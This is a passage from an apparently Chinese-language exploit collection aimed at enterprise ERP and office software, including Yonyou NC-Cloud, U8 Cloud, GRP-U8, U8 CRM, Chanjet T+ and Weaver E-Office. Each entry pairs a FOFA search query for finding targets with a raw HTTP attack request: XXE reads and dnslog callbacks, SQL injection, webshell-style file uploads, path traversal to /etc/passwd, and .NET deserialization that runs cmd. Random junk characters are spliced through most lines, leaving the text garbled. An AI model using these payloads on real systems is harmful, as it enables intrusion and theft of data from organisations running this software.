8 `9 [ ~- Y* G9 i0 m. VaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA, ^2 D. r) E; d `# v% C
Content-Length: 190
) ]8 b) V( g5 G1 Y: \Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
% Q3 g4 Y8 k6 u( L
+ v5 H, x! `* [9 \5 d3 R. g--fd28cb44e829ed1c197ec3bc71748df0: _( O$ g& f9 u/ ~9 x. i
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
4 m- M: o6 g5 W% R8 @7 p5 w6 j$ Z1 i# U
<%out.println(1111*1111);%>/ p/ S: I# z: o8 w
--fd28cb44e829ed1c197ec3bc71748df0--
N. t) r. s0 k1 c2 l
. I* j% f, Z1 d5 t8 ~) Q4 G; y; G% R* T- }
36. 用友NC-Cloud soapFormat XXE2 G% M& m4 j, D7 L
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
7 V+ i/ X: ?$ m5 \1 o( H6 }POST /uapws/soapFormat.ajax HTTP/1.1! d5 q6 l! l- M
Host: 192.168.40.130:8989- l/ {. ^1 Z) X/ ?6 `( A/ S. }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0( }. o# j" b8 U1 A3 x, Z, q8 Q8 W$ d
Content-Length: 263) j! ?: B4 R( C% M+ G$ `9 L4 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 f( I' P. k- P. E( @Accept-Encoding: gzip, deflate6 ]" f2 N, p0 W! I9 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 T1 o8 Z* Q5 O3 S3 w
Connection: close2 ^% |! V& p% Z) @% Q( N n ]* z
Content-Type: application/x-www-form-urlencoded' a6 |0 Z" s' |. n1 ?7 Z
Upgrade-Insecure-Requests: 14 h# a a# F) m1 B* h
9 K; f9 p) B4 T
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a7 x1 B, Y" l, K+ Q2 m3 n
6 Z# e: L- H% H
0 M0 r% @7 _, p+ l: v8 M37. 用友NC-Cloud IUpdateService XXE
, ?0 O, {) c+ m9 f CFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
5 F* A7 l" x0 f F$ o$ k2 NPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1! U, q, { W0 z/ `6 ]" J
Host: 192.168.40.130:8989. `. o8 Z2 V; F% ^ P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
7 X9 l1 ^! D( `( X- Y' UContent-Length: 421
+ ?% o, h0 Z1 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 U9 ?9 }: c+ p" ~7 b( r8 x( x
Accept-Encoding: gzip, deflate( X* P2 U$ B0 Y+ Q0 `. F2 J
Accept-Language: zh-CN,zh;q=0.9/ p& q' r5 W J; Q
Connection: close
0 Z2 ? p1 Z5 h* n gContent-Type: text/xml;charset=UTF-80 @% m( q) M% w4 `+ g# e9 @
SOAPAction: urn:getResult8 _8 f" x! ]7 {, R
Upgrade-Insecure-Requests: 1
$ b: I0 V G# c7 B; L$ _; Z; `1 Z% X$ i; Y A. f2 i' u& R
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
/ w* W9 g7 l/ m) l<soapenv:Header/>2 Y8 k: Z+ I' S$ M# B$ f
<soapenv:Body>0 p/ w3 {; X" O+ ?% D( D; N8 x
<iup:getResult>; W$ L: {( H7 W* i
<!--type: string-->
* E6 p8 x8 n2 p/ y. g<iup:string><![CDATA[
' C* ~0 b3 B: ^. n* W( q( [4 h<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>" S7 p0 K- `/ `# M8 R* M( z+ Z
<xxx/>]]></iup:string>; \4 q( E8 o! u% n, p- {: k
</iup:getResult>1 {1 X4 J; W8 o/ T/ Z
</soapenv:Body>0 ?6 j" v& g7 L. ^. y8 R
</soapenv:Envelope>
( I; A1 ?. h- l4 D9 |; N B" X. M6 a5 X' ]5 C
) Y: d& R ?- \7 W, q8 V) k: l
2 h1 y* n$ s5 E( C' F
38. 用友U8 Cloud smartweb2.RPC.d XXE! ^! m- u1 D5 [2 q
FOFA:app="用友-U8-Cloud"8 n; d1 `0 w6 w& H& L4 g6 K: `& Y
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
/ c3 W, x% F7 D3 rHost: 192.168.40.131:8088
! ~) i- C8 z, D! O$ [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25- N% A( A. P. T; |/ p) ^6 H
Content-Length: 260
) k6 K" u. N8 G$ J, f2 \7 n+ xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b30 h) M# v, W+ X. y7 e& T
Accept-Encoding: gzip, deflate
3 a% i, w+ |2 a6 vAccept-Language: zh-CN,zh;q=0.9
; k1 I( m+ N* \6 |/ AConnection: close3 \- s; v% X/ X9 I5 {
Content-Type: application/x-www-form-urlencoded( I3 k6 {5 w- h
4 z" {* K# x. [( U6 [" i__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>' W$ T1 M! R9 ~
3 X6 h. u: } o6 f; q+ v1 Q; ]
: E8 K# f: O# q* b3 o39. 用友U8 Cloud RegisterServlet SQL注入0 [' o6 V: W7 k5 w* U; o
FOFA:title="u8c"
9 G8 a9 r5 R9 Q$ G6 e9 hPOST /servlet/RegisterServlet HTTP/1.14 {( G& T8 j- D5 @
Host: 192.168.86.128:8089
. W; C. c1 E6 _* m; ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.361 j' d/ [5 q0 y/ S, ?$ H
Connection: close, ~( v4 h% a; t8 Z0 Q
Content-Length: 855 r' J( u1 Y, p; Y
Accept: */*+ Q1 g' O" A3 d. q) J% L0 ]
Accept-Language: en
: ]# n# S& q; }. XContent-Type: application/x-www-form-urlencoded
/ _; _9 d- i8 k' B) W* MX-Forwarded-For: 127.0.0.1% B7 V$ `. Q- x! W" O
Accept-Encoding: gzip
: y3 A- m. e' {
: `! p( V2 G+ Y5 M1 ausercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--* E3 T1 n7 {: H# y ~
" v: o7 Z# I0 O2 f+ K
- F' g% c& G+ q; o40. 用友U8-Cloud XChangeServlet XXE
3 u; e; m+ F+ Q8 X4 v/ X' hFOFA:app="用友-U8-Cloud"
+ |7 ~+ s( ?- W3 a% ]! z8 [% }POST /service/XChangeServlet HTTP/1.1
" {6 P0 F6 E, PHost: x.x.x.x
% o) S/ I# g2 X' |6 `" w$ }/ QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 I }7 \( V9 T+ O& M! eContent-Type: text/xml1 X7 l# F( A8 V W! q, d
Connection: close
0 Q8 i0 X/ p+ S$ u
8 p5 n# I9 q# B' ~4 }<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>8 ]9 z, @) f$ U0 F! ^
3 P' ?$ X% ^8 N2 j5 t
5 v+ [/ y* f1 d. o2 y1 |
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入% ~/ }* K. W+ {9 t3 Z7 y
FOFA:app="用友-U8-Cloud". N# l" E3 R$ |8 H$ {
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1( C, f0 I! L- ^% c
Host:, |% D l; ]* X5 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 K- v+ B/ A( P; IContent-Type: application/json
5 l$ p U% {5 J4 `, e& pAccept-Encoding: gzip
8 r, h5 s8 E! o% }- KConnection: close
' @8 ~8 D9 `; l5 }( H5 v+ f6 J! H; s: L, q/ R
$ Z/ M8 r+ I! k! e1 i8 s
42. 用友GRP-U8 SmartUpload01 文件上传! _, V# J5 r: h* o" X M( i% ]6 n
FOFA:app="用友-GRP-U8"" Q' j: g$ c% k9 b
POST /u8qx/SmartUpload01.jsp HTTP/1.10 f) ^0 v& p; e6 W3 b5 a" m- u/ ^
Host: x.x.x.x
$ m0 t8 [5 R% k# p2 K3 x! ~' HContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt- Q6 n0 E6 N7 z! r0 V3 i0 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
6 h4 M6 r b4 E; s" c
; H% m/ |$ d) U, \' APAYLOAD
5 J& Y) Z; F0 l& i- D3 Z# b5 U( d' n( \% j' m) Y
/ G5 D3 O6 e# P" F* A5 e t* K% ~( xhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml- a- V2 B& Y& b; X
9 I/ ^$ P( W. U; Q/ p* ]
43. 用友GRP-U8 userInfoWeb SQL注入致RCE$ h) J4 w5 @9 g
FOFA:app="用友-GRP-U8"7 ?/ d* d3 W5 u( k* E# P1 U
POST /services/userInfoWeb HTTP/1.1
! R$ \& W# i) \! @Host: your-ip" r, ?/ o8 t6 t [$ Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 r, G8 x. ]7 a0 d4 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 {% J/ X2 s- Z6 E3 C, M
Accept-Encoding: gzip, deflate* _2 a. H3 U2 d2 _, m% Z- s
Accept-Language: zh-CN,zh;q=0.9
+ u! t8 a& y2 j" R2 N5 aConnection: close
+ }/ \, W: P( P6 P1 {2 y7 w f& M* OSOAPAction:) F$ A" `0 Z1 W4 w! |
Content-Type: text/xml;charset=UTF-8
) Q5 U& z$ T; y( M, ^; z/ ]( A( l. I9 S* d" m1 h7 `* D% R
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
# j) Y- I4 ]3 p <soapenv:Header/>7 o' B0 N) H" L6 ]
<soapenv:Body>
8 L! X, {+ i9 o- o) w <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">: H1 z2 q# Y% y- y" C
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>1 {9 [2 |- h9 d) u$ v
</ser:getUserNameById>- E* x) x9 o8 ~! G4 B
</soapenv:Body>
: Q4 J- I3 g: B8 q</soapenv:Envelope>/ z0 X: k/ u; c; K7 T5 p
; q& q- G0 b( \% B
, o7 }) L6 c) i2 q
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
4 s9 \6 z+ M! U; i* r, BFOFA:app="用友-GRP-U8"
2 t0 h# e0 } z3 rGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
4 H! [: ^) ]0 u/ VHost: your-ip
" C7 U, o' E; E; y( H/ aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
9 y! h5 f0 j3 I7 x6 [' S4 h1 Q* FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, n: R0 N# J: ]
Accept-Encoding: gzip, deflate0 k+ J; p! M( i! p
Accept-Language: zh-CN,zh;q=0.9
, p0 E9 Q6 E' X: D& c: x" [$ KConnection: close
, |+ d; E% x; f4 v1 J
+ A8 u% k. I9 A2 j$ l2 k* j* h3 Y- }
45. 用友GRP-U8 ufgovbank XXE- r" N0 g" c5 m$ {) B0 h
FOFA:app="用友-GRP-U8"
+ t* o; U$ e) s( f5 n( E( APOST /ufgovbank HTTP/1.1
/ O* J. P d0 W! yHost: 192.168.40.130:222' v% B1 Y8 o/ Y8 P, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
5 ?- X$ Q9 E/ l$ S1 c, ?5 wConnection: close
6 S6 i. x0 {0 }/ U; k( jContent-Length: 161& {5 y/ o+ @, U; {$ k+ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 P+ z7 Z" q `9 F8 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& x+ r3 ~+ [8 ], B+ x+ _
Content-Type: application/x-www-form-urlencoded
! i& I6 y3 H# T& ]% aAccept-Encoding: gzip" @6 x# Q, {! F, z( b
4 n6 U' v' V" yreqData=<?xml version="1.0"?> N2 s p/ C [
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
! a* J a0 X" H, M, I
, P$ w0 e. _1 E1 c! x( {5 }6 F& [" g4 ?
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
. g8 Q2 w- Q6 I* q* z. D2 P7 b6 C. BFOFA:app="用友-GRP-U8"9 i- T. [! j2 ^. \' H* c8 N
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.15 n' I# I" P! z
Host: your-ip- C4 {0 Y' N# @/ x; C" @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
" j z0 V: b9 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; x) A* c5 J9 K, p$ p" a+ UAccept-Encoding: gzip, deflate
. k. ^1 j0 b, Y9 r0 L0 D: WAccept-Language: zh-CN,zh;q=0.9
. @) U& v5 P) a/ c5 x; i- eConnection: close% x5 Q; A8 _3 e- U' ]$ S1 M8 O
3 f5 X+ C& H# V+ A
9 n# e9 A; L) E7 D8 F4 d% _5 M47. 用友GRP A++Cloud 政府财务云 任意文件读取
+ J' T' Q- |& eFOFA:body="/pf/portal/login/css/fonts/style.css"0 ^; O* O n2 i- I5 e
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1& O0 g2 O, Z4 a$ h, D
Host: x.x.x.x
; [* Y2 L( w$ b8 ~0 M0 l' ?3 y" tCache-Control: max-age=0
" V) W2 {9 E. q! X. W* I( VUpgrade-Insecure-Requests: 17 I; g$ f6 |8 }; P! i+ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ m" c4 r1 D) n4 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 O4 _. x- d9 ?( d) A
Accept-Encoding: gzip, deflate, br# l( v4 }4 c( N [9 K* S3 b& K
Accept-Language: zh-CN,zh;q=0.9
) p' F; Z: n! G' vIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT6 L: V4 a9 v+ @1 J v$ E
Connection: close
% V4 W) g/ d7 I b! N5 {. G0 l; j" l# {
. s& f9 B- ^8 ]% t$ @, k4 ^7 u* S
( m$ Q, A; W( r48. 用友U8 CRM swfupload 任意文件上传. }, g8 ?8 c1 s
FOFA:title="用友U8CRM"
- v, Q( E7 W( h) {POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
$ o& u4 X$ P% k0 P2 q! P, u2 E6 qHost: your-ip
! J+ \0 c ^" V4 N& Z cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ m6 h( ~2 ]4 P3 t4 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. T6 q0 _0 F4 j9 K- h/ W+ Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 T" i& f& r' g' f; NAccept-Encoding: gzip, deflate
* x) i8 q1 M% |( t1 s( {& A2 MContent-Type: multipart/form-data;boundary=----269520967239406871642430066855% n% M0 [1 A' V
------269520967239406871642430066855: R' J8 X3 ?# o6 y' Z
Content-Disposition: form-data; name="file"; filename="s.php"5 B3 ]8 ^" F b I* c) H
1231
- M$ C- B; G4 M: L r7 F# g: {7 @Content-Type: application/octet-stream1 D3 m7 \$ W9 n) a6 a% \8 I
------2695209672394068716424300668556 d. b1 N6 a9 W1 [
Content-Disposition: form-data; name="upload"
, O! B( \5 R) i& r+ ]/ `, supload- i% r, V0 d, l9 I8 x
------269520967239406871642430066855-- H2 }+ c$ q6 s; M# {, |) B
+ v i9 x; x# Z1 V
9 Q/ D% J# S8 ~$ Y3 h& f, p
49. 用友U8 CRM系统uploadfile.php接口任意文件上传$ }6 _, n: l8 J3 a
FOFA:body="用友U8CRM". z3 h- o: C& G
4 K; ^) Z( @/ V/ GPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
& \" X% x2 H6 G+ X" DHost: x.x.x.x4 \% [% l8 d. l; S+ N M4 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
. H. U* D% f/ d+ n+ WContent-Length: 329$ t' i0 L0 d) [8 ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 N8 f9 ^9 z' t& H2 ~+ {9 yAccept-Encoding: gzip, deflate
3 x( h" b$ L) D* h5 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ ]5 O7 k8 P1 L; m0 j; x
Connection: close' x( S- Z& K1 k
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
9 c0 f2 R( R' }9 T' s0 Q% b b8 f# J4 A3 ], e
-----------------------------vvv3wdayqv3yppdxvn3w
) B' v& f1 i5 d0 x7 CContent-Disposition: form-data; name="file"; filename="%s.php "
8 S o6 t0 q8 YContent-Type: application/octet-stream: k# t. F- ^: G6 K
. R( |4 C1 o. M6 @# M t1 h
wersqqmlumloqa
/ ^4 `3 A0 U$ P) M) U' a: a-----------------------------vvv3wdayqv3yppdxvn3w
2 D0 Z1 @$ T3 p7 EContent-Disposition: form-data; name="upload"
1 i1 |: f7 e5 j' ~; R& A8 d, Z# e7 v% ^" x- {* g, d
upload
: p/ Q, U7 T y-----------------------------vvv3wdayqv3yppdxvn3w--
6 d5 V$ U8 x& N" [6 |: O z2 u3 t) V7 a3 K
/ N7 n3 B3 T6 r# M+ ^
http://x.x.x.x/tmpfile/updB3CB.tmp.php
, Y' o1 b% J& L- q* b1 f/ P4 l" ?3 d- B# f" E% T; G1 P; Q: s0 k" f
50. QDocs Smart School 6.4.1 filterRecords SQL注入
. r4 X6 q, y5 jFOFA:body="close closebtnmodal"
. c0 m* ?3 _: ]# I) O, tPOST /course/filterRecords/ HTTP/1.1
3 {, I) w/ l4 b5 }7 l7 YHost: x.x.x.x/ u( E- T. a/ c( Q2 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
8 a# G M/ X) C G# oConnection: close
* A! f( ~4 E! Q& B8 |Content-Length: 224) m1 D6 K6 v7 B
Accept: */*( `- g$ O& A; Y; v$ c, W" d
Accept-Language: en
; n# k6 C1 n' [9 A' oContent-Type: application/x-www-form-urlencoded+ S* F3 V5 s, T! U* E" s
Accept-Encoding: gzip! j# c0 J' E1 q$ r4 s$ _% r7 u
6 I6 ^" [" c+ p
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1; y6 h' |, a/ n/ C' [
, g. R* n% I+ v0 ~1 S; s: l4 o1 `
5 j, |$ |9 e7 s+ f* `( [51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
( [, i3 W% y/ w9 w2 |FOFA:app="云时空社会化商业ERP系统": H1 n# H) N0 G" o# ^/ L7 t
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.14 g: r, B/ \. F, Y4 C0 s& @' r Q
Host: your-ip
2 V1 D4 d5 ^# g# Y cUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36. p& _3 P6 v, ~. R Y+ g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& U }3 X8 U! s. Y9 G0 r$ c1 r, i. {
Accept-Encoding: gzip, deflate
' X) S1 ^4 m( O* N& ~/ rAccept-Language: zh-CN,zh;q=0.9, o$ [ M' H% x$ v! o# L9 i1 p
Connection: close
$ y' a7 _+ F3 _! i$ ^# b% ?7 ^% H+ I
! x) } `3 k2 o' b; a3 O: w% G$ Q52. 泛微E-Office json_common.php sql注入
, V5 c) M5 f4 p( F9 O/ KFOFA:app="泛微-EOffice"
$ G) I; `; V7 aPOST /building/json_common.php HTTP/1.1
' Z( g6 h' o" n: }Host: 192.168.86.128:8097# E5 y' Z/ N [
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 ^0 ^6 L4 Z, c D) v0 qConnection: close
9 n- m2 ?6 V, tContent-Length: 87
1 g2 N$ u$ v4 g! M9 gAccept: */*2 v, W3 f/ H, @% X& Q8 m
Accept-Language: en" k& X5 X* ?) j2 c6 T( Q; _5 [3 I
Content-Type: application/x-www-form-urlencoded, i4 E6 W4 n9 e0 B0 u* z9 L* \
Accept-Encoding: gzip& @" u# I4 ^! |- z! o+ t3 _0 K0 T6 H
8 o; j) s9 z* G2 [1 Q. I5 \8 Dtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3334 n$ \0 E5 P, s. h' n* c6 L* A
0 T0 T8 T7 X- R' |
1 R1 M* ?$ k; Z8 Q( E9 W53. 迪普 DPTech VPN Service 任意文件上传1 S! S6 U# L2 a) Y/ o; ]5 {
FOFA:app="DPtech-SSLVPN"! K* M) B+ X, g
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd0 \4 ?( {+ s7 Y; @6 B2 f
9 D* T( D& I) R; c& B" ]
' t+ h' ~$ e; Q9 p \) L$ f# M
54. 畅捷通T+ getstorewarehousebystore 远程代码执行( U+ _4 q+ u6 l) c' y
FOFA:app="畅捷通-TPlus"
% Y; A% B8 ]/ K第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
% u3 I) u* a) Y7 s9 }"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"# `% @0 k8 _9 a" u9 U% {& `
8 g" ]' d2 c% I8 `& {3 S4 W: x% }# s' e
完整数据包( b( @. @9 g! y. R! i( ?
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1! Z% i4 E5 k) T" F0 O
Host: x.x.x.x( Y2 @% h0 r0 a8 |
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F M7 s, W) M r- @- g5 l5 E0 O+ o
Content-Length: 593
6 i) @, D3 j. ^. @& M& W
( K# Y4 Z) D5 J' B! D, s: x{
) k r1 `, m- A' A- E8 q. Q"storeID":{! b) ^7 s( q) r! d6 q
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"," p4 F% T+ z0 `
"MethodName":"Start",2 f" r/ o5 W! y( `0 h X9 q% W
"ObjectInstance":{8 h! u3 Q0 t7 f' L' g" g; T( y% R7 g- y
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ g7 }" [8 N; } "StartInfo":{2 N, }) Y% I$ o% \8 O5 C
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",5 l6 q1 ~3 M$ |4 n4 X; j
"FileName":"cmd",
! |3 I/ R+ q4 Z7 ?/ ^: S "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
9 [+ B' y; D2 b; y. _; u }; j' g; ?" f% u$ d. b1 }0 m
}/ F% ^: A' y; n5 d
}+ X' a/ X1 i6 ]$ _2 J- _; ]
}
, p1 S" ~5 Y' Y0 A* a( z, [9 p$ M4 m# t4 ^, C0 F* F; I# }
) _2 s" s: j6 q! X5 o: G
第二步,访问如下url
! b6 A6 m( T4 R- p8 V/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
+ @; X9 E& m( o8 m. Q9 w4 _7 x u2 A' n4 ]0 ~- G
3 |: I+ k3 y# {2 H
55. 畅捷通T+ getdecallusers信息泄露* n- p# v4 }& p
FOFA:app="畅捷通-TPlus"; l( i; F" {! g+ c) J
第一步,通过* c( y6 c. E8 K: \
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
' ]1 K% V8 |9 B0 q第二步,利用获取到的Cookie请求
+ {( d8 }1 X8 M/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
) d" F6 l8 y& G# ?0 |5 {
/ n8 x* P" t7 w2 [: G' Y+ A; p56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE5 U# {. V& k* b8 j8 Y
FOFA: app="畅捷通-TPlus"
( K# f4 p+ [! b+ Z6 O2 J- ePOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
) p. o+ o! ?. A' k6 VHost: x.x.x.x7 V0 {6 K a; |# v4 d) ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
' V2 \! y$ \3 E( l nContent-Type: application/json9 y- I4 D2 B. F* T e- B
% r1 y f& O7 v1 G& m0 I/ n
{
! {' y0 R% t; y. G! u$ L "storeID":{. Y' @( [3 k1 @0 L' v; N
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
& H' Y7 ^$ s c. n5 s$ y "MethodName":"Start",- N3 X9 V ^+ J1 e3 k$ k
"ObjectInstance":{9 w* _- R& i( d4 J' A
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+ {( y4 g- L$ Z5 R1 z0 @ "StartInfo": {
